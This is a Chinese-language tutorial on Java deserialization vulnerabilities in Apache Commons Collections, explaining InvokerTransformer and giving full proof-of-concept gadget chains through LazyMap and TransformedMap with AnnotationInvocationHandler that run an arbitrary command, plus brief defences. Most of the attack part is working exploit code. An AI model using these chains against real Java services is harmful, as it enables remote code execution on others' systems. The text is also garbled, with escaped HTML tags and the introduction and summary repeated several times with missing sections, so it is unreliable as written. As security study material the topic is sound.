Java反序列化漏洞分析：Commons Collections篇（上）<\/h1>

前言<\/h2>
Commons Collections是Java中广泛使用的集合处理框架，许多商业和开源项目都依赖它。然而，正是这个强大的库成为了Java反序列化漏洞的重要来源，影响了WebLogic、WebSphere、JBoss、Jenkins、OpenNMS等众多组件和容器。<\/p>

核心漏洞点：InvokerTransformer<\/h2>

InvokerTransformer<\/code>类是Commons Collections反序列化漏洞的核心，其transform<\/code>方法实现了危险的反射调用：<\/p>

public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        return<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>        Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>iMethodName,<\/span> iParamTypes);<\/span>
<\/span><\/span>        return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> iArgs);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>NoSuchMethodException ex)<\/span> {<\/span>
<\/span><\/span>        throw<\/span> new<\/span> FunctorException(<\/span>"InvokerTransformer: The method '"<\/span> +<\/span> iMethodName +<\/span> "' on '"<\/span> +<\/span> input.<\/span>getClass<\/span>()<\/span> +<\/span> "' does not exist"<\/span>);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>IllegalAccessException ex)<\/span> {<\/span>
<\/span><\/span>        throw<\/span> new<\/span> FunctorException(<\/span>"InvokerTransformer: The method '"<\/span> +<\/span> iMethodName +<\/span> "' on '"<\/span> +<\/span> input.<\/span>getClass<\/span>()<\/span> +<\/span> "' cannot be accessed"<\/span>);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>InvocationTargetException ex)<\/span> {<\/span>
<\/span><\/span>        throw<\/span> new<\/span> FunctorException(<\/span>"InvokerTransformer: The method '"<\/span> +<\/span> iMethodName +<\/span> "' on '"<\/span> +<\/span> input.<\/span>getClass<\/span>()<\/span> +<\/span> "' threw an exception"<\/span>,<\/span> ex);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>利用示例<\/h3>

正常使用示例<\/strong>：<\/li>
<\/ol>
InvokerTransformer invokerTransformer =<\/span> new<\/span> InvokerTransformer(<\/span>
<\/span><\/span>    "append"<\/span>,<\/span> 
<\/span><\/span>    new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>    new<\/span> Object[]{<\/span>new<\/span> String(<\/span>"sb"<\/span>)}<\/span>
<\/span><\/span>);<\/span>
<\/span><\/span>Object result =<\/span> invokerTransformer.<\/span>transform<\/span>(<\/span>new<\/span> StringBuffer(<\/span>"who am i"<\/span>));<\/span>
<\/span><\/span>System.<\/span>out<\/span>.<\/span>printf<\/span>(<\/span>result.<\/span>toString<\/span>());<\/span>
<\/span><\/span><\/code><\/pre>
命令执行示例<\/strong>：<\/li>
<\/ol>
\/\/ Mac下
<\/span><\/span><\/span><\/span>String[]<\/span> cmds =<\/span> new<\/span> String[]{<\/span>"open"<\/span>,<\/span> "\/Applications\/Calculator.app\/"<\/span>};<\/span>
<\/span><\/span>InvokerTransformer invokerTransformer1 =<\/span> new<\/span> InvokerTransformer(<\/span>
<\/span><\/span>    "exec"<\/span>,<\/span> 
<\/span><\/span>    new<\/span> Class[]{<\/span>String[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>    new<\/span> Object[]{<\/span>cmds}<\/span>
<\/span><\/span>);<\/span>
<\/span><\/span>invokerTransformer1.<\/span>transform<\/span>(<\/span>Runtime.<\/span>getRuntime<\/span>());<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ Windows下
<\/span><\/span><\/span><\/span>String[]<\/span> cmds =<\/span> new<\/span> String[]{<\/span>"calc.exe"<\/span>};<\/span>
<\/span><\/span>InvokerTransformer invokerTransformer1 =<\/span> new<\/span> InvokerTransformer(<\/span>
<\/span><\/span>    "exec"<\/span>,<\/span> 
<\/span><\/span>    new<\/span> Class[]{<\/span>String[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>    new<\/span> Object[]{<\/span>cmds}<\/span>
<\/span><\/span>);<\/span>
<\/span><\/span>invokerTransformer1.<\/span>transform<\/span>(<\/span>Runtime.<\/span>getRuntime<\/span>());<\/span>
<\/span><\/span><\/code><\/pre>
使用ProcessBuilder<\/strong>：<\/li>
<\/ol>
ProcessBuilder processBuilder =<\/span> new<\/span> ProcessBuilder(<\/span>"open"<\/span>,<\/span> "\/Applications\/Calculator.app\/"<\/span>);<\/span>
<\/span><\/span>InvokerTransformer invokerTransformer1 =<\/span> new<\/span> InvokerTransformer(<\/span>
<\/span><\/span>    "start"<\/span>,<\/span> 
<\/span><\/span>    new<\/span> Class[]{},<\/span> 
<\/span><\/span>    new<\/span> Object[]{}<\/span>
<\/span><\/span>);<\/span>
<\/span><\/span>invokerTransformer1.<\/span>transform<\/span>(<\/span>processBuilder);<\/span>
<\/span><\/span><\/code><\/pre>反序列化利用原理<\/h2>
Java反序列化的一个关键特性是：不管经过多少层封装，最终都会按照被封装的倒序执行readObject<\/code>方法。这意味着我们可以在readObject<\/code>中构造恶意代码。<\/p>
简单示例<\/h3>
public<\/span> class<\/span> A<\/span> implements<\/span> Serializable {<\/span>
<\/span><\/span>    private<\/span> void<\/span> readObject<\/span>(<\/span>java.<\/span>io<\/span>.<\/span>ObjectInputStream<\/span> in)<\/span> 
<\/span><\/span>        throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            System.<\/span>out<\/span>.<\/span>printf<\/span>(<\/span>"whoami"<\/span>);<\/span>
<\/span><\/span>            new<\/span> ProcessBuilder(<\/span>"calc.exe"<\/span>).<\/span>start<\/span>();<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>实际漏洞利用链分析<\/h2>
情况1：通过LazyMap.get()<\/h3>
调用链：<\/p>
AnnotationInvocationHandler.readObject() 
→ AnnotationInvocationHandler.invoke() 
→ LazyMap.get() 
→ InvokerTransformer.transform()
<\/code><\/pre>
关键点：<\/p>

使用ChainedTransformer<\/code>串联多个Transformer<\/code>：<\/li>
<\/ol>
final<\/span> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        execArgs),<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>1<\/span>)<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>
完整POC：<\/li>
<\/ol>
final<\/span> String[]<\/span> execArgs =<\/span> new<\/span> String[]<\/span> {<\/span> command };<\/span>
<\/span><\/span>final<\/span> Transformer transformerChain =<\/span> new<\/span> ChainedTransformer(<\/span>
<\/span><\/span>    new<\/span> Transformer[]{<\/span> new<\/span> ConstantTransformer(<\/span>1<\/span>)});<\/span>
<\/span><\/span>final<\/span> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]<\/span> {<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]<\/span> {<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]<\/span> {<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]<\/span> {<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]<\/span> {<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        execArgs),<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>1<\/span>)<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>final<\/span> Map innerMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>final<\/span> Map lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>innerMap,<\/span> transformerChain);<\/span>
<\/span><\/span>final<\/span> Map mapProxy =<\/span> Gadgets.<\/span>createMemoitizedProxy<\/span>(<\/span>lazyMap,<\/span> Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>final<\/span> InvocationHandler handler =<\/span> Gadgets.<\/span>createMemoizedInvocationHandler<\/span>(<\/span>mapProxy);<\/span>
<\/span><\/span>Reflections.<\/span>setFieldValue<\/span>(<\/span>transformerChain,<\/span> "iTransformers"<\/span>,<\/span> transformers);<\/span>
<\/span><\/span>return<\/span> handler;<\/span>
<\/span><\/span><\/code><\/pre>情况2：通过TransformedMap.checkSetValue()<\/h3>
调用链：<\/p>
InvokerTransformer.transform() 
→ TransformedMap.checkSetValue() 
→ AbstractInputCheckedMapDecorator.setValue() 
→ AnnotationInvocationHandler.readObject()
<\/code><\/pre>
关键点：<\/p>


需要满足两个条件：<\/p>

memberValues<\/code>不能为空<\/li>
memberType<\/code>不能为空<\/li>
<\/ul>
<\/li>

完整POC：<\/p>
<\/li>
<\/ol>
public<\/span> InvocationHandler getObject<\/span>(<\/span>final<\/span> String command)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    final<\/span> String[]<\/span> execArgs =<\/span> new<\/span> String[]{<\/span>command};<\/span>
<\/span><\/span>    final<\/span> Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>        new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>        new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>            new<\/span> Class[]{<\/span> String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>            new<\/span> Object[]{<\/span> "getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>        new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>            new<\/span> Class[]{<\/span> Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>            new<\/span> Object[]{<\/span> null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>        new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>            new<\/span> Class[]{<\/span> String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>            execArgs),<\/span>
<\/span><\/span>        new<\/span> ConstantTransformer(<\/span>1<\/span>)<\/span>
<\/span><\/span>    };<\/span>
<\/span><\/span>    final<\/span> Transformer transformerChain =<\/span> new<\/span> ChainedTransformer(<\/span>
<\/span><\/span>        new<\/span> Transformer[]{<\/span>new<\/span> ConstantTransformer(<\/span>1<\/span>)});<\/span>
<\/span><\/span>    Map map =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>    Map transformedmap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> transformerChain);<\/span>
<\/span><\/span>    transformedmap.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "xx"<\/span>);<\/span>
<\/span><\/span>    Class cls =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>    InvocationHandler handler =<\/span> (<\/span>InvocationHandler)<\/span> 
<\/span><\/span>        getFirstCtor(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>)<\/span>
<\/span><\/span>        .<\/span>newInstance<\/span>(<\/span>Retention.<\/span>class<\/span>,<\/span> transformedmap);<\/span>
<\/span><\/span>    Reflections.<\/span>setFieldValue<\/span>(<\/span>transformerChain,<\/span> "iTransformers"<\/span>,<\/span> transformers);<\/span>
<\/span><\/span>    return<\/span> handler;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

升级Commons Collections到安全版本<\/li>
限制反序列化的类<\/li>
使用安全的序列化\/反序列化库<\/li>
实施输入验证和过滤<\/li>
<\/ol>
总结<\/h2>
Commons Collections反序列化漏洞的核心在于InvokerTransformer<\/code>类的滥用，通过精心构造的调用链可以实现任意代码执行。理解这些漏洞原理对于开发安全的Java应用至关重要。<\/p>

Java反序列化漏洞分析：Commons Collections篇（上）<\/h1>

前言<\/h2>
Commons Collections是Java中广泛使用的集合处理框架，许多商业和开源项目都依赖它。然而，正是这个强大的库成为了Java反序列化漏洞的重要来源，影响了WebLogic、WebSphere、JBoss、Jenkins、OpenNMS等众多组件和容器。<\/p>

反序列化利用原理<\/h2>
Java反序列化的一个关键特性是：不管经过多少层封装，最终都会按照被封装的倒序执行`readObject<\/code>方法。这意味着我们可以在readObject<\/code>中构造恶意代码。<\/p>`

实际漏洞利用链分析<\/h2>

总结<\/h2>
Commons Collections反序列化漏洞的核心在于`InvokerTransformer<\/code>类的滥用，通过精心构造的调用链可以实现任意代码执行。理解这些漏洞原理对于开发安全的Java应用至关重要。<\/p>`

Java反序列化漏洞分析：Commons Collections篇（上）<\/h1>

前言<\/h2> Commons Collections是Java中广泛使用的集合处理框架，许多商业和开源项目都依赖它。然而，正是这个强大的库成为了Java反序列化漏洞的重要来源，影响了WebLogic、WebSphere、JBoss、Jenkins、OpenNMS等众多组件和容器。<\/p>

反序列化利用原理<\/h2> Java反序列化的一个关键特性是：不管经过多少层封装，最终都会按照被封装的倒序执行readObject<\/code>方法。这意味着我们可以在readObject<\/code>中构造恶意代码。<\/p>

实际漏洞利用链分析<\/h2>

总结<\/h2> Commons Collections反序列化漏洞的核心在于InvokerTransformer<\/code>类的滥用，通过精心构造的调用链可以实现任意代码执行。理解这些漏洞原理对于开发安全的Java应用至关重要。<\/p>

前言<\/h2>
Commons Collections是Java中广泛使用的集合处理框架，许多商业和开源项目都依赖它。然而，正是这个强大的库成为了Java反序列化漏洞的重要来源，影响了WebLogic、WebSphere、JBoss、Jenkins、OpenNMS等众多组件和容器。<\/p>

反序列化利用原理<\/h2>
Java反序列化的一个关键特性是：不管经过多少层封装，最终都会按照被封装的倒序执行`readObject<\/code>方法。这意味着我们可以在readObject<\/code>中构造恶意代码。<\/p>`

总结<\/h2>
Commons Collections反序列化漏洞的核心在于`InvokerTransformer<\/code>类的滥用，通过精心构造的调用链可以实现任意代码执行。理解这些漏洞原理对于开发安全的Java应用至关重要。<\/p>`